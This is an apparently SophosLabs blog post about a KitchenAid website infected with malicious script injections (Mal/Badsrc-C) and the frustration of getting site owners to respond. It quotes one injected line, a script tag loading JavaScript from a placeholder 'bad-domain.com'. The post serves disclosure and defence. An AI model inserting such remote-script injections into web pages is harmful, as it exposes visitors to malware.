Sophos Cloud Optix
Update: SophosLabs can confirm that the website has now been cleaned up.
In August last year, SophosLabs first noticed that a Sophos customer was blocked from visiting a page on the KitchenAid website due to a detection of Mal/Badsrc-C.
Over the last six months I and several of my colleagues have been trying to talk to contacts at KitchenAid and Whirlpool to inform them of the issue and offer assistance. We have consistently hit brick walls.
When I initiate a crawl of the KitchenAid site the crawler returns the following results
4 instances of Mal/Badsrc-C found
hxxp://XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N
hxxp://XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N
hxxp://XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N
hxxp://XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N
The X’s representing letters and the N’s representing numbers in the above.
Whenever, I talk to customers and people in IT and I tell them we find legitimate websites compromised by malicious code, their natural response is to say ‘Do you contact them?’
To which I reply, ‘We try but …’
- Emailing the address in the WHOIS records gets nowhere because it is either wrong, goes nowhere or messages are not read.
- Emailing contact details on the websites suffers the same problems.
- Phoning up to find the IT department is difficult.
- Once you have found the IT department finding someone who either understands or cares is time consuming.
Some of the responses we do get back are so negative that we wonder why we bother.
The particular sites infected have multiple copies of a
<script src=http://bad-domain.com/b.js>
on the pages and even though the site they point to is currently dead there is no guarantee that it will stay that way.
So why is the KitchenAid site still infected?
If you have any comments or answers then contact this blog via sophosblog@sophos.com.